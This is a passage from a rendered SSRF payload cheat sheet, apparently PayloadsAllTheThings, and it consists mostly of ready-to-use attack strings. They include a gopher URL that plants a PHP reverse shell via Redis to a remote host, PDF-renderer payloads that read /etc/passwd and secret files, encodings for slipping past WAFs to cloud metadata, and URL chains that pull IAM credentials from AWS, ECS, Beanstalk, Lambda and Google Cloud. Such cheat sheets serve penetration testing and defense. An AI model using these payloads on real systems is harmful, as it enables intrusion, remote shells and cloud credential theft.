<a id="__codelineno-35-10" name="__codelineno-35-10" href="#__codelineno-35-10"></a><span class="n">gopher</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">_set</span><span class="k">%</span><span class="n">20payload</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">22</span><span class="k">%</span><span class="n">3C</span><span class="k">%</span><span class="n">3Fphp</span><span class="k">%</span><span class="n">20shell_exec</span><span class="k">%</span><span class="n">28</span><span class="k">%</span><span class="n">27bash</span><span class="k">%</span><span class="n">20-i</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">3E</span><span class="k">%</span><span class="n">26</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">2Fdev</span><span class="k">%</span><span class="n">2Ftcp</span><span class="k">%</span><span class="n">2FREMOTE_IP</span><span class="k">%</span><span class="n">2FREMOTE_PORT</span><span class="k">%</span><span class="n">200</span><span class="k">%</span><span class="n">3E</span><span class="k">%</span><span class="n">261</span><span class="k">%</span><span class="n">27</span><span class="k">%</span><span class="n">29</span><span class="k">%</span><span class="n">3B</span><span class="k">%</span><span class="n">3F</span><span class="k">%</span><span class="n">3E</span><span class="k">%</span><span class="n">22</span>
<a id="__codelineno-35-11" name="__codelineno-35-11" href="#__codelineno-35-11"></a><span class="n">gopher</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">_save</span>
</code></pre></div>
<h2 id="ssrf-exploiting-pdf-file">SSRF exploiting PDF file</h2>
<p><img alt="https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png" src="https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png" /></p>
<p>Example with <a href="https://www.youtube.com/watch?v=t5fB6OZsR6c&amp;feature=emb_title">WeasyPrint by @nahamsec</a></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-36-1" name="__codelineno-36-1" href="#__codelineno-36-1"></a><span class="p">&lt;</span><span class="n">link</span> <span class="n">rel</span><span class="p">=</span><span class="n">attachment</span> <span class="n">href</span><span class="p">=</span><span class="s2">&quot;file:///root/secret.txt&quot;</span><span class="p">&gt;</span>
</code></pre></div>
<p>Example with PhantomJS </p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-37-1" name="__codelineno-37-1" href="#__codelineno-37-1"></a><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span>
<a id="__codelineno-37-2" name="__codelineno-37-2" href="#__codelineno-37-2"></a><span class="w"> </span><span class="nx">exfil</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="ow">new</span><span class="w"> </span><span class="nx">XMLHttpRequest</span><span class="p">();</span>
<a id="__codelineno-37-3" name="__codelineno-37-3" href="#__codelineno-37-3"></a><span class="w"> </span><span class="nx">exfil</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">&quot;GET&quot;</span><span class="p">,</span><span class="s2">&quot;file:///etc/passwd&quot;</span><span class="p">);</span>
<a id="__codelineno-37-4" name="__codelineno-37-4" href="#__codelineno-37-4"></a><span class="w"> </span><span class="nx">exfil</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span>
<a id="__codelineno-37-5" name="__codelineno-37-5" href="#__codelineno-37-5"></a><span class="w"> </span><span class="nx">exfil</span><span class="p">.</span><span class="nx">onload</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kd">function</span><span class="p">(){</span><span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">responseText</span><span class="p">);}</span>
<a id="__codelineno-37-6" name="__codelineno-37-6" href="#__codelineno-37-6"></a><span class="w"> </span><span class="nx">exfil</span><span class="p">.</span><span class="nx">onerror</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kd">function</span><span class="p">(){</span><span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="s1">&#39;failed!&#39;</span><span class="p">)}</span>
<a id="__codelineno-37-7" name="__codelineno-37-7" href="#__codelineno-37-7"></a><span class="o">&lt;</span><span class="err">/script&gt;</span>
</code></pre></div>
<h2 id="blind-ssrf">Blind SSRF</h2>
<blockquote>
<p>When exploiting server-side request forgery, we can often find ourselves in a position where the response cannot be read. </p>
</blockquote>
<p>Use an SSRF chain to gain an Out-of-Band output.</p>
<p>From https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/ / https://github.com/assetnote/blind-ssrf-chains</p>
<p><strong>Possible via HTTP(s)</strong>
- <a href="https://github.com/assetnote/blind-ssrf-chains#elasticsearch">Elasticsearch</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#weblogic">Weblogic</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#consul">Hashicorp Consul</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#shellshock">Shellshock</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#druid">Apache Druid</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#solr">Apache Solr</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#peoplesoft">PeopleSoft</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#struts">Apache Struts</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#jboss">JBoss</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#confluence">Confluence</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#jira">Jira</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#atlassian-products">Other Atlassian Products</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#opentsdb">OpenTSDB</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#jenkins">Jenkins</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#hystrix">Hystrix Dashboard</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#w3">W3 Total Cache</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#docker">Docker</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#redisexporter">Gitlab Prometheus Redis Exporter</a></p>
<p><strong>Possible via Gopher</strong>
- <a href="https://github.com/assetnote/blind-ssrf-chains#redis">Redis</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#memcache">Memcache</a>
- <a href="https://github.com/assetnote/blind-ssrf-chains#tomcat">Apache Tomcat</a></p>
<h2 id="ssrf-to-xss">SSRF to XSS</h2>
<p>by <a href="https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158">@D0rkerDevil &amp; @alyssa.o.herrera</a></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-38-1" name="__codelineno-38-1" href="#__codelineno-38-1"></a>http://brutelogic.com.br/poc.svg<span class="w"> </span>-&gt;<span class="w"> </span>simple<span class="w"> </span>alert
<a id="__codelineno-38-2" name="__codelineno-38-2" href="#__codelineno-38-2"></a>https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri<span class="o">=</span><span class="w"> </span>-&gt;<span class="w"> </span>simple<span class="w"> </span>ssrf
<a id="__codelineno-38-3" name="__codelineno-38-3" href="#__codelineno-38-3"></a>
<a id="__codelineno-38-4" name="__codelineno-38-4" href="#__codelineno-38-4"></a>https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri<span class="o">=</span>http://brutelogic.com.br/poc.svg
</code></pre></div>
<h2 id="ssrf-from-xss">SSRF from XSS</h2>
<h3 id="using-an-iframe">Using an iframe</h3>
<p>The content of the file will be integrated inside the PDF as an image or text.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-39-1" name="__codelineno-39-1" href="#__codelineno-39-1"></a><span class="p">&lt;</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">&quot;echopwn&quot;</span> <span class="na">onerror</span><span class="o">=</span><span class="s">&quot;document.write(&#39;&lt;iframe src=file:///etc/passwd&gt;&lt;/iframe&gt;&#39;)&quot;</span><span class="p">/&gt;</span>
</code></pre></div>
<h3 id="using-an-attachment">Using an attachment</h3>
<p>Example of a PDF attachment using HTML </p>
<ol>
<li>use <code>&lt;link rel=attachment href="URL"&gt;</code> as Bio text</li>
<li>use 'Download Data' feature to get PDF</li>
<li>use <code>pdfdetach -saveall filename.pdf</code> to extract embedded resource</li>
<li><code>cat attachment.bin</code></li>
</ol>
<h2 id="ssrf-url-for-cloud-instances">SSRF URL for Cloud Instances</h2>
<h3 id="ssrf-url-for-aws">SSRF URL for AWS</h3>
<p>The AWS Instance Metadata Service is a service available within Amazon EC2 instances that allows those instances to access metadata about themselves. - <a href="http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories">Docs</a></p>
<ul>
<li>IPv4 endpoint (old): <code>http://169.254.169.254/latest/meta-data/</code></li>
<li>
<p>IPv4 endpoint (new) requires the header <code>X-aws-ec2-metadata-token</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-40-1" name="__codelineno-40-1" href="#__codelineno-40-1"></a><span class="n">export</span> <span class="n">TOKEN</span><span class="p">=`</span><span class="nb">curl </span><span class="n">-X</span> <span class="n">PUT</span> <span class="n">-H</span> <span class="s2">&quot;X-aws-ec2-metadata-token-ttl-seconds: 21600&quot;</span> <span class="s2">&quot;http://169.254.169.254/latest/api/token&quot;</span><span class="p">`</span>
<a id="__codelineno-40-2" name="__codelineno-40-2" href="#__codelineno-40-2"></a><span class="nb">curl </span><span class="n">-H</span> <span class="s2">&quot;X-aws-ec2-metadata-token:$TOKEN&quot;</span> <span class="n">-v</span> <span class="s2">&quot;http://169.254.169.254/latest/meta-data&quot;</span>
</code></pre></div></p>
</li>
<li>
<p>IPv6 endpoint: <code>http://[fd00:ec2::254]/latest/meta-data/</code> </p>
</li>
</ul>
<p>In case of a WAF, you might want to try different ways to connect to the API.
* DNS record pointing to the AWS API IP
<div class="highlight"><pre><span></span><code><a id="__codelineno-41-1" name="__codelineno-41-1" href="#__codelineno-41-1"></a><span class="n">http</span><span class="p">://</span><span class="n">instance-data</span>
<a id="__codelineno-41-2" name="__codelineno-41-2" href="#__codelineno-41-2"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span>
<a id="__codelineno-41-3" name="__codelineno-41-3" href="#__codelineno-41-3"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">nip</span><span class="p">.</span><span class="n">io</span><span class="p">/</span>
</code></pre></div>
* HTTP redirect
<div class="highlight"><pre><span></span><code><a id="__codelineno-42-1" name="__codelineno-42-1" href="#__codelineno-42-1"></a><span class="n">Static</span><span class="p">:</span><span class="n">http</span><span class="p">://</span><span class="n">nicob</span><span class="p">.</span><span class="n">net</span><span class="p">/</span><span class="n">redir6a</span>
<a id="__codelineno-42-2" name="__codelineno-42-2" href="#__codelineno-42-2"></a><span class="n">Dynamic</span><span class="p">:</span><span class="n">http</span><span class="p">://</span><span class="n">nicob</span><span class="p">.</span><span class="n">net</span><span class="p">/</span><span class="n">redir-http</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">:</span><span class="n">80</span><span class="p">-</span>
</code></pre></div>
* Encoding the IP to bypass WAF
<div class="highlight"><pre><span></span><code><a id="__codelineno-43-1" name="__codelineno-43-1" href="#__codelineno-43-1"></a><span class="n">http</span><span class="p">://</span><span class="n">425</span><span class="p">.</span><span class="n">510</span><span class="p">.</span><span class="n">425</span><span class="p">.</span><span class="n">510</span> <span class="n">Dotted</span> <span class="n">decimal</span> <span class="n">with</span> <span class="n">overflow</span>
<a id="__codelineno-43-2" name="__codelineno-43-2" href="#__codelineno-43-2"></a><span class="n">http</span><span class="p">://</span><span class="n">2852039166</span> <span class="n">Dotless</span> <span class="n">decimal</span>
<a id="__codelineno-43-3" name="__codelineno-43-3" href="#__codelineno-43-3"></a><span class="n">http</span><span class="p">://</span><span class="n">7147006462</span> <span class="n">Dotless</span> <span class="n">decimal</span> <span class="n">with</span> <span class="n">overflow</span>
<a id="__codelineno-43-4" name="__codelineno-43-4" href="#__codelineno-43-4"></a><span class="n">http</span><span class="p">://</span><span class="n">0xA9</span><span class="p">.</span><span class="n">0xFE</span><span class="p">.</span><span class="n">0xA9</span><span class="p">.</span><span class="n">0xFE</span> <span class="n">Dotted</span> <span class="n">hexadecimal</span>
<a id="__codelineno-43-5" name="__codelineno-43-5" href="#__codelineno-43-5"></a><span class="n">http</span><span class="p">://</span><span class="n">0xA9FEA9FE</span> <span class="n">Dotless</span> <span class="n">hexadecimal</span>
<a id="__codelineno-43-6" name="__codelineno-43-6" href="#__codelineno-43-6"></a><span class="n">http</span><span class="p">://</span><span class="n">0x41414141A9FEA9FE</span> <span class="n">Dotless</span> <span class="n">hexadecimal</span> <span class="n">with</span> <span class="n">overflow</span>
<a id="__codelineno-43-7" name="__codelineno-43-7" href="#__codelineno-43-7"></a><span class="n">http</span><span class="p">://</span><span class="n">0251</span><span class="p">.</span><span class="n">0376</span><span class="p">.</span><span class="n">0251</span><span class="p">.</span><span class="n">0376</span> <span class="n">Dotted</span> <span class="n">octal</span>
<a id="__codelineno-43-8" name="__codelineno-43-8" href="#__codelineno-43-8"></a><span class="n">http</span><span class="p">://</span><span class="n">0251</span><span class="p">.</span><span class="n">00376</span><span class="p">.</span><span class="n">000251</span><span class="p">.</span><span class="n">0000376</span> <span class="n">Dotted</span> <span class="n">octal</span> <span class="n">with</span> <span class="n">padding</span>
<a id="__codelineno-43-9" name="__codelineno-43-9" href="#__codelineno-43-9"></a><span class="n">http</span><span class="p">://</span><span class="n">0251</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span> <span class="n">Mixed</span> <span class="n">encoding</span> <span class="p">(</span><span class="n">dotted</span> <span class="n">octal</span> <span class="p">+</span> <span class="n">dotted</span> <span class="n">decimal</span><span class="p">)</span>
<a id="__codelineno-43-10" name="__codelineno-43-10" href="#__codelineno-43-10"></a><span class="n">http</span><span class="p">://[::</span><span class="n">ffff</span><span class="p">:</span><span class="n">a9fe</span><span class="p">:</span><span class="n">a9fe</span><span class="p">]</span> <span class="n">IPV6</span> <span class="n">Compressed</span>
<a id="__codelineno-43-11" name="__codelineno-43-11" href="#__codelineno-43-11"></a><span class="n">http</span><span class="p">://[</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">ffff</span><span class="p">:</span><span class="n">a9fe</span><span class="p">:</span><span class="n">a9fe</span><span class="p">]</span> <span class="n">IPV6</span> <span class="n">Expanded</span>
<a id="__codelineno-43-12" name="__codelineno-43-12" href="#__codelineno-43-12"></a><span class="n">http</span><span class="p">://[</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">ffff</span><span class="p">:</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">]</span> <span class="n">IPV6</span><span class="p">/</span><span class="n">IPV4</span>
<a id="__codelineno-43-13" name="__codelineno-43-13" href="#__codelineno-43-13"></a><span class="n">http</span><span class="p">://[</span><span class="n">fd00</span><span class="p">:</span><span class="n">ec2</span><span class="p">::</span><span class="n">254</span><span class="p">]</span> <span class="n">IPV6</span>
</code></pre></div></p>
<p>These URLs return a list of IAM roles associated with the instance. You can then append the role name to this URL to retrieve the security credentials for the role.
<div class="highlight"><pre><span></span><code><a id="__codelineno-44-1" name="__codelineno-44-1" href="#__codelineno-44-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">iam</span><span class="p">/</span><span class="n">security-credentials</span>
<a id="__codelineno-44-2" name="__codelineno-44-2" href="#__codelineno-44-2"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">iam</span><span class="p">/</span><span class="n">security-credentials</span><span class="p">/</span><span class="no">[ROLE NAME]</span>
<a id="__codelineno-44-3" name="__codelineno-44-3" href="#__codelineno-44-3"></a>
<a id="__codelineno-44-4" name="__codelineno-44-4" href="#__codelineno-44-4"></a><span class="c"># Examples</span>
<a id="__codelineno-44-5" name="__codelineno-44-5" href="#__codelineno-44-5"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">iam</span><span class="p">/</span><span class="n">security-credentials</span><span class="p">/</span><span class="n">PhotonInstance</span>
<a id="__codelineno-44-6" name="__codelineno-44-6" href="#__codelineno-44-6"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">iam</span><span class="p">/</span><span class="n">security-credentials</span><span class="p">/</span><span class="n">dummy</span>
<a id="__codelineno-44-7" name="__codelineno-44-7" href="#__codelineno-44-7"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">iam</span><span class="p">/</span><span class="n">security-credentials</span><span class="p">/</span><span class="n">s3access</span>
</code></pre></div></p>
<p>This URL is used to access the user data that was specified when launching the instance. User data is often used to pass startup scripts or other configuration information into the instance.
<div class="highlight"><pre><span></span><code><a id="__codelineno-45-1" name="__codelineno-45-1" href="#__codelineno-45-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">user-data</span>
</code></pre></div></p>
<p>Other URLs to query to access various pieces of metadata about the instance, like the hostname, public IPv4 address, and other properties.
<div class="highlight"><pre><span></span><code><a id="__codelineno-46-1" name="__codelineno-46-1" href="#__codelineno-46-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span>
<a id="__codelineno-46-2" name="__codelineno-46-2" href="#__codelineno-46-2"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">ami-id</span>
<a id="__codelineno-46-3" name="__codelineno-46-3" href="#__codelineno-46-3"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">reservation-id</span>
<a id="__codelineno-46-4" name="__codelineno-46-4" href="#__codelineno-46-4"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">hostname</span>
<a id="__codelineno-46-5" name="__codelineno-46-5" href="#__codelineno-46-5"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">public-keys</span><span class="p">/</span>
<a id="__codelineno-46-6" name="__codelineno-46-6" href="#__codelineno-46-6"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">public-keys</span><span class="p">/</span><span class="n">0</span><span class="p">/</span><span class="n">openssh-key</span>
<a id="__codelineno-46-7" name="__codelineno-46-7" href="#__codelineno-46-7"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">public-keys</span><span class="p">/</span><span class="no">[ID]</span><span class="p">/</span><span class="n">openssh-key</span>
<a id="__codelineno-46-8" name="__codelineno-46-8" href="#__codelineno-46-8"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">dynamic</span><span class="p">/</span><span class="n">instance-identity</span><span class="p">/</span><span class="n">document</span>
</code></pre></div></p>
<p>E.g: Jira SSRF leading to AWS info disclosure - <code>https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance</code></p>
<p>E.g2: Flaws challenge - <code>http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/</code></p>
<h3 id="ssrf-url-for-aws-ecs">SSRF URL for AWS ECS</h3>
<p>If you have an SSRF with file system access on an ECS instance, try extracting <code>/proc/self/environ</code> to get UUID.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-47-1" name="__codelineno-47-1" href="#__codelineno-47-1"></a><span class="nb">curl </span><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">170</span><span class="p">.</span><span class="n">2</span><span class="p">/</span><span class="n">v2</span><span class="p">/</span><span class="n">credentials</span><span class="p">/&lt;</span><span class="n">UUID</span><span class="p">&gt;</span>
</code></pre></div>
<p>This way you'll extract IAM keys of the attached role</p>
<h3 id="ssrf-url-for-aws-elastic-beanstalk">SSRF URL for AWS Elastic Beanstalk</h3>
<p>We retrieve the <code>accountId</code> and <code>region</code> from the API.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-48-1" name="__codelineno-48-1" href="#__codelineno-48-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">dynamic</span><span class="p">/</span><span class="n">instance-identity</span><span class="p">/</span><span class="n">document</span>
<a id="__codelineno-48-2" name="__codelineno-48-2" href="#__codelineno-48-2"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">iam</span><span class="p">/</span><span class="n">security-credentials</span><span class="p">/</span><span class="n">aws-elasticbeanorastalk-ec2-role</span>
</code></pre></div>
<p>We then retrieve the <code>AccessKeyId</code>, <code>SecretAccessKey</code>, and <code>Token</code> from the API.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-49-1" name="__codelineno-49-1" href="#__codelineno-49-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">iam</span><span class="p">/</span><span class="n">security-credentials</span><span class="p">/</span><span class="n">aws-elasticbeanorastalk-ec2-role</span>
</code></pre></div>
<p><img alt="notsosecureblog-awskey" src="https://www.notsosecure.com/wp-content/uploads/2019/02/aws-cli.jpg" /></p>
<p>Then we use the credentials with <code>aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/</code>.</p>
<h3 id="ssrf-url-for-aws-lambda">SSRF URL for AWS Lambda</h3>
<p>AWS Lambda provides an HTTP API for custom runtimes to receive invocation events from Lambda and send response data back within the Lambda execution environment.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-50-1" name="__codelineno-50-1" href="#__codelineno-50-1"></a><span class="n">http</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">9001</span><span class="p">/</span><span class="n">2018</span><span class="p">-</span><span class="n">06</span><span class="p">-</span><span class="n">01</span><span class="p">/</span><span class="n">runtime</span><span class="p">/</span><span class="n">invocation</span><span class="p">/</span><span class="n">next</span>
<a id="__codelineno-50-2" name="__codelineno-50-2" href="#__codelineno-50-2"></a><span class="p">$</span> <span class="nb">curl </span><span class="s2">&quot;http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next&quot;</span>
</code></pre></div>
<p>Docs: https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html#runtimes-api-next</p>
<h3 id="ssrf-url-for-google-cloud">SSRF URL for Google Cloud</h3>
<p><img alt="⚠" class="twemoji" src="https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/svg/26a0.svg" title=":warning:" /> Google is shutting down support for usage of the <strong>v1 metadata service</strong> on January 15.</p>
<p>Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-51-1" name="__codelineno-51-1" href="#__codelineno-51-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span>
<a id="__codelineno-51-2" name="__codelineno-51-2" href="#__codelineno-51-2"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span>
<a id="__codelineno-51-3" name="__codelineno-51-3" href="#__codelineno-51-3"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span>
<a id="__codelineno-51-4" name="__codelineno-51-4" href="#__codelineno-51-4"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">instance</span><span class="p">/</span><span class="n">hostname</span>
<a id="__codelineno-51-5" name="__codelineno-51-5" href="#__codelineno-51-5"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">instance</span><span class="p">/</span><span class="n">id</span>
<a id="__codelineno-51-6" name="__codelineno-51-6" href="#__codelineno-51-6"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">project</span><span class="p">/</span><span class="n">project-id</span>
</code></pre></div>
<p>Google allows recursive pulls</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-52-1" name="__codelineno-52-1" href="#__codelineno-52-1"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">instance</span><span class="p">/</span><span class="n">disks</span><span class="p">/</span><span class="k">?</span><span class="n">recursive</span><span class="p">=</span><span class="n">true</span>
</code></pre></div>
<p>Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)</p>
